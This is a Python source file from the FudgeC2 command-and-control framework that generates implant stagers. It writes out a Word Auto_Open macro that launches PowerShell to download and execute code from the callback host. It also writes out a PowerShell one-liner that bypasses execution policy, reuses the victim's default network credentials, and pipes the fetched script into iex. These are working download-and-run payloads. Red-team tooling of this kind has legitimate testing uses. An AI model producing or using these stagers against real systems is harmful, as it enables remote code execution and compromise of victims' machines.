Codebase list fudgec2 / 442d02a ServerApp / modules / StagerGeneration.py
442d02a

Tree @442d02a (Download .tar.gz)

StagerGeneration.py @442d02araw · history · blame 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
class StagerGeneration():
    db = None
    def __init__(self, db_pointer):
        self.db = db_pointer

    def GenerateStaticStagers(self,cid, user):
        ret_data = {}
        if self.db.Verify_UserCanAccessCampaign(user,cid):
            ImplantInfo = self.db.Get_AllImplantBaseFromCid(cid)
            if ImplantInfo != False:
                for implant in ImplantInfo:
                    ret_data[implant['title']]={
                        "description":implant['description'],
                        "url":implant['callback_url'],
                        "powershell_stager":self.__generate_powershell_stager_string(implant),
                        "docm_macro_stager":self.__generate_docx_stager_string(implant),
                        "stager_key":implant['stager_key']}
            return ret_data
        else:
            return ret_data

    def GenerateSingleStagerFile(self,cid,user,stager_type):
        # TODO: Create docx file download from template.
        #   users can currently use the docx stager string as a replacement.
        if self.db.Verify_UserCanAccessCampaign(user,cid):

            if stager_type == "docx":
                return self.__generate_docx_stager_file()
            return
        else:
            return False


    def __generate_docx_stager_string(self, implant_data):
        stager_string = '''Sub Auto_Open()
Dim exec As String
exec = "powershell.exe ""IEX ((new-object net.webclient).downloadstring('{}:{}/robots.txt?user={}'))"""
Shell (exec)
End Sub
:return:'''.format(implant_data['callback_url'], str(implant_data['port']), implant_data['stager_key'])

        return stager_string


    def __generate_powershell_stager_string(self, implant_data):
        stager_string = "powershell -exec bypass - c \"(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://" + \
                        implant_data['callback_url'] + ":" + str(implant_data['port']) + "/robots.txt?user=" + implant_data[
                            'stager_key'] + "')|iex"
        return stager_string